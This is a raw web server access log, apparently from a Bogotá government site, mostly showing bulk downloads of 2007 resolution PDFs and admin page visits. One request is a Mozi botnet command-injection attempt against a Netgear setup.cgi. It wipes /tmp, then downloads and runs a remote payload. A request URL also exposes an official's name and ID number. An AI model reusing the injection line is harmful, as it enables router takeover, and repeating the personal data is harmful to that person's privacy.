181.61.164.108 - - [13/May/2022:09:24:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204285%20DE%202007.pdf HTTP/1.1" 200 325271
181.61.164.108 - - [13/May/2022:09:24:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204286%20DE%202007.pdf HTTP/1.1" 200 1257578
181.61.164.108 - - [13/May/2022:09:24:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204287%20DE%202007.pdf HTTP/1.1" 200 201051
181.61.164.108 - - [13/May/2022:09:24:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204288%20DE%202007.pdf HTTP/1.1" 200 48327
181.61.164.108 - - [13/May/2022:09:24:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204289%20DE%202007.pdf HTTP/1.1" 200 226637
201.245.192.253 - - [13/May/2022:09:24:52 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 69343
181.61.164.108 - - [13/May/2022:09:24:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204290%20DE%202007.pdf HTTP/1.1" 200 2119819
181.61.164.108 - - [13/May/2022:09:24:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204291%20DE%202007.pdf HTTP/1.1" 200 361423
181.61.164.108 - - [13/May/2022:09:24:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204292%20%20DE%202007.pdf HTTP/1.1" 200 933074
181.61.164.108 - - [13/May/2022:09:25:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204293%20%20DE%202007.pdf HTTP/1.1" 200 1091677
181.61.164.108 - - [13/May/2022:09:25:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204294%20DE%202007.pdf HTTP/1.1" 200 278921
181.61.164.108 - - [13/May/2022:09:25:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204295%20DE%202007.pdf HTTP/1.1" 200 426177
181.61.164.108 - - [13/May/2022:09:25:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204296%20DE%202007.pdf HTTP/1.1" 200 180937
181.61.164.108 - - [13/May/2022:09:25:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204297%20DE%202007.pdf HTTP/1.1" 200 365223
181.61.164.108 - - [13/May/2022:09:25:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204298%20DE%202007.pdf HTTP/1.1" 200 185791
181.61.164.108 - - [13/May/2022:09:25:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204299%20DE%202007.pdf HTTP/1.1" 200 720821
181.61.164.108 - - [13/May/2022:09:25:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204201%20AL%204300/RESOLUCION%204300%20DE%202007.pdf HTTP/1.1" 200 581651
201.245.192.253 - - [13/May/2022:09:25:14 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 72866
172.22.2.4 - - [13/May/2022:09:25:30 -0500] "GET /BLA/boletinlegal/actuator/gateway/routes HTTP/1.1" 404 1018
172.22.2.4 - - [13/May/2022:09:24:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2022:09:26:00 -0500] "GET /BLA/boletinlegal/admin/actos/mostrar.php HTTP/1.1" 200 355743
201.245.192.253 - - [13/May/2022:09:26:06 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 69343
201.245.192.253 - - [13/May/2022:09:26:18 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 72862
216.245.221.92 - - [13/May/2022:09:26:23 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [13/May/2022:09:26:40 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 69343
172.22.2.4 - - [13/May/2022:09:25:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
201.245.192.253 - - [13/May/2022:09:26:50 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 72866
175.4.208.77 - - [13/May/2022:09:27:14 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
172.22.2.4 - - [13/May/2022:09:27:08 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 7002
186.102.62.197 - - [13/May/2022:09:27:33 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18OoSXBGOy6NM3F1WMrLhNydIPnxi9St+iATXKrdSsoN1D4dnFqpHfm&y=U2FsdGVkX1+kB9fssisrRTY56eUghzAK54ZVDnJNCNRmJPDIendYk95+dCExu2Q/ HTTP/1.1" 200 30
172.22.2.4 - - [13/May/2022:09:27:16 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 7002
172.22.2.4 - - [13/May/2022:09:27:42 -0500] "GET /BLA/boletinlegal/admin/index_files/index_files/tback.gif HTTP/1.1" 404 1362
172.22.2.4 - - [13/May/2022:09:28:44 -0500] "GET /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7143
172.22.2.4 - - [13/May/2022:09:28:44 -0500] "GET /BLA/boletinlegal/admin/js/jquery-1.3.1.min.js HTTP/1.1" 200 55272
172.22.2.4 - - [13/May/2022:09:28:44 -0500] "GET /BLA/boletinlegal/admin/js/jquery.functions.js HTTP/1.1" 200 2317
172.22.2.4 - - [13/May/2022:09:28:44 -0500] "GET /BLA/boletinlegal/admin/js/nicEdit-latest.js HTTP/1.1" 200 38373
172.22.2.4 - - [13/May/2022:09:28:44 -0500] "GET /BLA/boletinlegal/admin/img/h1.png HTTP/1.1" 200 3227
172.22.2.4 - - [13/May/2022:09:28:44 -0500] "GET /BLA/boletinlegal/admin/img/overlay.png HTTP/1.1" 200 984
181.61.164.108 - - [13/May/2022:09:28:56 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2007%2FRES+2007+4301+AL+4352%2F HTTP/1.1" 200 14905
181.61.164.108 - - [13/May/2022:09:28:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204301%20DE%202007.pdf HTTP/1.1" 200 323490
181.61.164.108 - - [13/May/2022:09:29:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204302%20DE%202007.pdf HTTP/1.1" 200 297392
181.61.164.108 - - [13/May/2022:09:29:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204303%20DE%202007.pdf HTTP/1.1" 200 846752
181.61.164.108 - - [13/May/2022:09:29:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204304%20DE%202007.pdf HTTP/1.1" 200 778947
181.61.164.108 - - [13/May/2022:09:29:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204305%20DE%202007.pdf HTTP/1.1" 200 858324
181.61.164.108 - - [13/May/2022:09:29:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204306%20DE%202007.pdf HTTP/1.1" 200 1042275
181.61.164.108 - - [13/May/2022:09:29:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204307%20DE%202007.pdf HTTP/1.1" 200 673783
181.61.164.108 - - [13/May/2022:09:29:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204308%20DE%202007.pdf HTTP/1.1" 200 851417
181.61.164.108 - - [13/May/2022:09:29:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204309%20DE%202007.pdf HTTP/1.1" 200 906291
181.61.164.108 - - [13/May/2022:09:29:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204310%20DE%202007.pdf HTTP/1.1" 200 907614
181.61.164.108 - - [13/May/2022:09:29:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204311%20DE%202007.pdf HTTP/1.1" 200 664654
181.61.164.108 - - [13/May/2022:09:29:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204312%20DE%202007.pdf HTTP/1.1" 200 501010
181.61.164.108 - - [13/May/2022:09:29:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204313%20DE%202007.pdf HTTP/1.1" 200 913135
181.61.164.108 - - [13/May/2022:09:29:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204314%20DE%202007.pdf HTTP/1.1" 200 800970
181.61.164.108 - - [13/May/2022:09:29:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204315%20DE%202007.pdf HTTP/1.1" 200 317775
181.61.164.108 - - [13/May/2022:09:29:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204316%20DE%202007.pdf HTTP/1.1" 200 162418
181.61.164.108 - - [13/May/2022:09:29:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204317%20DE%202007.pdf HTTP/1.1" 200 297437
181.61.164.108 - - [13/May/2022:09:29:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204318%20DE%202007.pdf HTTP/1.1" 200 163923
181.61.164.108 - - [13/May/2022:09:29:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204319%20DE%202007.pdf HTTP/1.1" 200 540007
181.61.164.108 - - [13/May/2022:09:29:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204320%20DE%202007.pdf HTTP/1.1" 200 758475
181.61.164.108 - - [13/May/2022:09:29:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204321%20DE%202007.pdf HTTP/1.1" 200 355719
181.61.164.108 - - [13/May/2022:09:29:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204322%20DE%202007.pdf HTTP/1.1" 200 680436
181.61.164.108 - - [13/May/2022:09:29:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204323%20DE%202007.pdf HTTP/1.1" 200 531801
181.61.164.108 - - [13/May/2022:09:29:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204324%20DE%202007.pdf HTTP/1.1" 200 1032107
181.61.164.108 - - [13/May/2022:09:29:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204325%20DE%202007.pdf HTTP/1.1" 200 983740
181.61.164.108 - - [13/May/2022:09:29:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204326%20DE%202007.pdf HTTP/1.1" 200 235895
181.61.164.108 - - [13/May/2022:09:29:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204327%20DE%202007.pdf HTTP/1.1" 200 402895
181.61.164.108 - - [13/May/2022:09:29:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204328%20DE%202007.pdf HTTP/1.1" 200 229542
181.61.164.108 - - [13/May/2022:09:29:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204329%20DE%202007.pdf HTTP/1.1" 200 653903
181.61.164.108 - - [13/May/2022:09:29:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204330%20DE%202007.pdf HTTP/1.1" 200 357391
181.61.164.108 - - [13/May/2022:09:29:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204331%20DE%202007.pdf HTTP/1.1" 200 249557
181.61.164.108 - - [13/May/2022:09:29:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204332%20DE%202007.pdf HTTP/1.1" 200 672169
181.61.164.108 - - [13/May/2022:09:29:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204333%20DE%202007.pdf HTTP/1.1" 200 1560346
181.61.164.108 - - [13/May/2022:09:29:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204334%20DE%202007.pdf HTTP/1.1" 200 435413
181.61.164.108 - - [13/May/2022:09:29:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204335%20DE%202007.pdf HTTP/1.1" 200 873496
181.61.164.108 - - [13/May/2022:09:29:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204336%20DE%202007.pdf HTTP/1.1" 200 299022
181.61.164.108 - - [13/May/2022:09:29:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204337%20DE%202007.pdf HTTP/1.1" 200 535581
181.61.164.108 - - [13/May/2022:09:29:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204338%20DE%202007.pdf HTTP/1.1" 200 1199054
181.61.164.108 - - [13/May/2022:09:29:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204339%20DE%202007.pdf HTTP/1.1" 200 895090
181.61.164.108 - - [13/May/2022:09:29:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204340%20%20DE%202007.pdf HTTP/1.1" 200 706806
181.61.164.108 - - [13/May/2022:09:30:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204341%20%20DE%202007.pdf HTTP/1.1" 200 649965
181.61.164.108 - - [13/May/2022:09:30:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204342%20DE%202007.pdf HTTP/1.1" 200 241218
181.61.164.108 - - [13/May/2022:09:30:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204343%20DE%202007.pdf HTTP/1.1" 200 480755
181.61.164.108 - - [13/May/2022:09:30:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204344%20DE%202007.pdf HTTP/1.1" 200 157364
172.22.2.4 - - [13/May/2022:09:30:04 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
181.61.164.108 - - [13/May/2022:09:30:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204345%20DE%202007.pdf HTTP/1.1" 200 231448
181.61.164.108 - - [13/May/2022:09:30:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204346%20DE%202007.pdf HTTP/1.1" 200 227269
181.61.164.108 - - [13/May/2022:09:30:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204347%20DE%202007.pdf HTTP/1.1" 200 258989
201.245.192.253 - - [13/May/2022:09:30:10 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
181.61.164.108 - - [13/May/2022:09:30:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204348%20DE%202007.pdf HTTP/1.1" 200 282665
181.61.164.108 - - [13/May/2022:09:30:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204349%20DE%202007.pdf HTTP/1.1" 200 217677
181.61.164.108 - - [13/May/2022:09:30:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204350%20DE%202007.pdf HTTP/1.1" 200 630772
181.61.164.108 - - [13/May/2022:09:30:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204351%20DE%202007.pdf HTTP/1.1" 200 243291
181.61.164.108 - - [13/May/2022:09:30:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204301%20AL%204352/RESOLUCION%204352%20DE%202007.pdf HTTP/1.1" 200 605687
172.22.2.4 - - [13/May/2022:09:30:38 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
172.22.2.4 - - [13/May/2022:09:30:48 -0500] "GET /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7143
192.168.171.93 - - [13/May/2022:09:31:03 -0500] "GET /unete-al-global-big-day-y-registra-el-mayor-numero-de-aves.html HTTP/1.1" 200 770
172.22.2.4 - - [13/May/2022:09:30:58 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 7002
172.22.2.4 - - [13/May/2022:09:31:15 -0500] "GET /BLA/boletinlegal/admin/index_files/index_files/tback.gif HTTP/1.1" 404 1362
172.22.2.4 - - [13/May/2022:09:31:20 -0500] "GET /BLA/boletinlegal/admin/actos/mostrar.php HTTP/1.1" 200 355743
172.22.2.4 - - [13/May/2022:09:31:20 -0500] "GET /BLA/boletinlegal/tabla_files/orangebrownie.css HTTP/1.1" 404 1354
172.22.2.4 - - [13/May/2022:09:31:20 -0500] "GET /BLA/boletinlegal/css/global/buttons.css HTTP/1.1" 404 1352
216.245.221.92 - - [13/May/2022:09:31:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2022:09:31:31 -0500] "POST /BLA/boletinlegal/admin/actos/mostrar.php HTTP/1.1" 200 308001
172.22.2.4 - - [13/May/2022:09:31:31 -0500] "GET /BLA/boletinlegal/tabla_files/orangebrownie.css HTTP/1.1" 404 1354
172.22.2.4 - - [13/May/2022:09:31:31 -0500] "GET /BLA/boletinlegal/css/global/buttons.css HTTP/1.1" 404 1352
172.22.2.4 - - [13/May/2022:09:30:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2022:09:30:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53344
172.22.2.4 - - [13/May/2022:09:30:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
201.245.192.253 - - [13/May/2022:09:31:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46292
20.191.45.212 - - [13/May/2022:09:32:48 -0500] "GET / HTTP/1.1" 200 319
20.191.45.212 - - [13/May/2022:09:32:49 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.61.164.108 - - [13/May/2022:09:33:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0001.pdf HTTP/1.1" 200 8495935
181.61.164.108 - - [13/May/2022:09:33:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0002.pdf HTTP/1.1" 200 267806
181.61.164.108 - - [13/May/2022:09:33:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0019.PDF HTTP/1.1" 200 3088011
181.61.164.108 - - [13/May/2022:09:33:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0022.pdf HTTP/1.1" 200 266471
181.61.164.108 - - [13/May/2022:09:33:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0023.pdf HTTP/1.1" 200 69371
181.61.164.108 - - [13/May/2022:09:33:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0024.pdf HTTP/1.1" 200 143390
181.61.164.108 - - [13/May/2022:09:33:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0030.pdf HTTP/1.1" 200 200228
181.61.164.108 - - [13/May/2022:09:33:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0031.pdf HTTP/1.1" 200 83284
181.61.164.108 - - [13/May/2022:09:33:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0040.pdf HTTP/1.1" 200 79686
181.61.164.108 - - [13/May/2022:09:33:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0071.pdf HTTP/1.1" 200 461476
181.61.164.108 - - [13/May/2022:09:33:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0072.pdf HTTP/1.1" 200 198654
201.245.192.253 - - [13/May/2022:09:32:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46471
181.61.164.108 - - [13/May/2022:09:33:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0073.pdf HTTP/1.1" 200 320265
201.245.192.253 - - [13/May/2022:09:33:30 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 69343
181.61.164.108 - - [13/May/2022:09:33:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0086.pdf HTTP/1.1" 200 243601
181.61.164.108 - - [13/May/2022:09:33:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0097.pdf HTTP/1.1" 200 129686
181.61.164.108 - - [13/May/2022:09:33:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0110.pdf HTTP/1.1" 200 1605474
181.61.164.108 - - [13/May/2022:09:33:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0198.pdf HTTP/1.1" 200 49857
181.61.164.108 - - [13/May/2022:09:33:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0270.pdf HTTP/1.1" 200 34961
181.61.164.108 - - [13/May/2022:09:33:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0296.pdf HTTP/1.1" 200 89867
181.61.164.108 - - [13/May/2022:09:33:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0422.pdf HTTP/1.1" 200 342221
181.61.164.108 - - [13/May/2022:09:33:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0427.pdf HTTP/1.1" 200 262626
181.61.164.108 - - [13/May/2022:09:33:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0481.pdf HTTP/1.1" 200 488155
181.61.164.108 - - [13/May/2022:09:33:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0519.pdf HTTP/1.1" 200 1195372
181.61.164.108 - - [13/May/2022:09:33:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0520.pdf HTTP/1.1" 200 91251
181.61.164.108 - - [13/May/2022:09:33:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0623.pdf HTTP/1.1" 200 541812
181.61.164.108 - - [13/May/2022:09:33:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0639.pdf HTTP/1.1" 200 258892
181.61.164.108 - - [13/May/2022:09:33:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0797.pdf HTTP/1.1" 200 558299
181.61.164.108 - - [13/May/2022:09:33:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/0964.pdf HTTP/1.1" 200 341372
181.61.164.108 - - [13/May/2022:09:33:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1058.pdf HTTP/1.1" 200 28840
201.245.192.253 - - [13/May/2022:09:33:55 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 72866
201.245.192.253 - - [13/May/2022:09:34:03 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 73855
181.61.164.108 - - [13/May/2022:09:35:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1184.pdf HTTP/1.1" 200 426605
201.245.192.253 - - [13/May/2022:09:35:08 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [13/May/2022:09:35:08 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
201.245.192.253 - - [13/May/2022:09:35:08 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
201.245.192.253 - - [13/May/2022:09:35:08 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
201.245.192.253 - - [13/May/2022:09:35:08 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [13/May/2022:09:35:08 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.61.164.108 - - [13/May/2022:09:35:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1258.pdf HTTP/1.1" 200 1232726
181.61.164.108 - - [13/May/2022:09:35:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1288.pdf HTTP/1.1" 200 159278
181.61.164.108 - - [13/May/2022:09:35:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1730.pdf HTTP/1.1" 200 1197478
181.61.164.108 - - [13/May/2022:09:35:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1759.pdf HTTP/1.1" 200 616844
181.61.164.108 - - [13/May/2022:09:35:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1828.pdf HTTP/1.1" 200 378221
181.61.164.108 - - [13/May/2022:09:35:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1870.pdf HTTP/1.1" 200 2428610
181.61.164.108 - - [13/May/2022:09:35:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1873.pdf HTTP/1.1" 200 59773
201.245.192.253 - - [13/May/2022:09:35:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.61.164.108 - - [13/May/2022:09:35:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/1931.PDF HTTP/1.1" 200 96220
201.245.192.253 - - [13/May/2022:09:35:17 -0500] "POST /appsia/controlador HTTP/1.1" 200 7791
181.61.164.108 - - [13/May/2022:09:35:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/2212.pdf HTTP/1.1" 200 120222
201.245.192.253 - - [13/May/2022:09:35:18 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [13/May/2022:09:35:18 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
201.245.192.253 - - [13/May/2022:09:35:18 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
201.245.192.253 - - [13/May/2022:09:35:18 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
201.245.192.253 - - [13/May/2022:09:35:18 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [13/May/2022:09:35:18 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [13/May/2022:09:35:18 -0500] "POST /appsia/controlador HTTP/1.1" 200 5250
181.61.164.108 - - [13/May/2022:09:35:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/2331.pdf HTTP/1.1" 200 109526
201.245.192.253 - - [13/May/2022:09:35:20 -0500] "GET /appsia/controlador?comando=regresar&id=79952688&funcionario=JESUS+ALBERTO+MARTINEZ+CESPEDES&desde=79952688&hasta=79952688&version=79952688 HTTP/1.1" 200 7791
181.61.164.108 - - [13/May/2022:09:35:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/2839.pdf HTTP/1.1" 200 57616
181.61.164.108 - - [13/May/2022:09:35:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/3075.pdf HTTP/1.1" 200 154411
201.245.192.253 - - [13/May/2022:09:35:22 -0500] "POST /appsia/controlador HTTP/1.1" 200 6656
181.61.164.108 - - [13/May/2022:09:35:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/3181.pdf HTTP/1.1" 200 1054732
